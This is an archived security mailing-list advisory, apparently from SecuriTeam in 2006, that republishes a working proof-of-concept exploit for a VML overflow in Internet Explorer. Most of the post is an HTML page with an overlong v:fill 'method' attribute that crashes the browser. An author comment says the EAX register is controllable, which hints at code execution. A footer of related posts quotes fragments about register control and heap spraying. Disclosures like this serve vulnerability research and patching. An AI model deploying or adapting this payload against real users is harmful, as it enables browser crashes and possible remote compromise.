[EXPL] Internet Explorer VML DoS (Exploit)
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 20 Sep 2006 17:45:39 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Internet Explorer VML DoS (Exploit)
------------------------------------------------------------------------
SUMMARY
Vulnerability in the VML extention of Internet Explorer allows for denial
of service.
DETAILS
Exploit:
<!--
Currently just a DoS
EAX is controllable and currently it crashes when trying to move EBX into
the location pointed to by EAX
Shirkdog
-->
<html xmlns:v="urn:schemas-microsoft-com:vml">
<head>
<object id="VMLRender"
classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">
</object>
<style>
v\:* { behavior: url(#VMLRender); }
</style>
</head>
<body>
<v:rect style='width:120pt;height:80pt' fillcolor="red">
<v:fill method="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAABCD01" angle="-45"
focus="100%" focusposition=".5,.5" focussize="0,0"
type="gradientRadial" />
</v:rect>
</body>
</html>
ADDITIONAL INFORMATION
The original article can be found at:
<http://www.milw0rm.com/exploits/2400>
http://www.milw0rm.com/exploits/2400
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [NT] Symantec Norton Insufficient Validation of 'SymEvent' Driver Input Buffer
- Next by Date: [NEWS] Bypassing Network Access Control (NAC) Systems
- Previous by thread: [NT] Symantec Norton Insufficient Validation of 'SymEvent' Driver Input Buffer
- Next by thread: [NEWS] Bypassing Network Access Control (NAC) Systems
- Index(es):
Relevant Pages
- [NT] Windows Help Files Heap Overflow
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... EDX 0009E5D8 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..."
... set ecx -> Top SE handler address ... set eax -> Set EAX to a pointer
to our supplied input ... (Securiteam) - [NT] Winamp ID3v2 Buffer Overflow
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Winamp is vulnerable to a buffer
overflow vulnerability when processing ... control the EAX register, ... (Securiteam) - [NT] Cisco ACS UCP Pre-Authentication Buffer Overflows
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... .text:00401068 test eax,
eax ... .text:00401070 push eax; char * ... .text:0040288D push ecx; char
* ... (Securiteam) - [NEWS] Apple QuickTime Malformed GIF Heap Overflow
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Apple QuickTime Malformed GIF
Heap Overflow ... text:66A339EB movsx eax, ax ... text:66A339F7 movsx edx,
cx ... (Securiteam) - [EXPL] Internet Explorer DHTML Arbitrary Code Execution (MS05-020)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... MOV EAX, DWORD PTR; EAX
= Some pointer to the heap for mshtml ... To get some control over the "dirty" value we try to
"spray" the heap ... so we use as big a string as possible. ... (Securiteam)